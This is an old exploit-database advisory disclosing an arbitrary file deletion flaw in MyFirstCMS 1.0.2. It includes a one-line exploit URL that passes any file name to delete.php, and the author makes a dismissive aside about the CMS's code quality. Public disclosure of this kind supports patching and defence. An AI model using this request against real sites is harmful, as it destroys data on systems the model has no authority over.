MyFirstCMS 1.0.2 - Arbitrary File Delete

EDB-ID:

8787

CVE:

N/A


Platform:

PHP

Published:

2009-05-26

--+++==========================================================================+++--
--+++========== MyFirstCMS <= 1.0.2 Remote File Delete Vulnerability ==========+++--
--+++==========================================================================+++--


[+] Author   : darkjoker
[+] Site     : http://darkjoker.net23.net
[+] Download : http://ostatic.com/myfirstcms


[+] Short note:
This CMS also has other vulnerabilities, such as SQL Injections, but,
unfortuntaly, who wrote this CMS was a bit an idiot, because declared
functions called, for example, 'try', forgot some ';' or '}' somewhere...
Call me lazy or what you want but I don't want to spend time fixing a CMS
just for code an exploit ...

[+] Exploit: http://hostname/myfirstcms/delete.php?file=[file_to_delete]

# milw0rm.com [2009-05-26]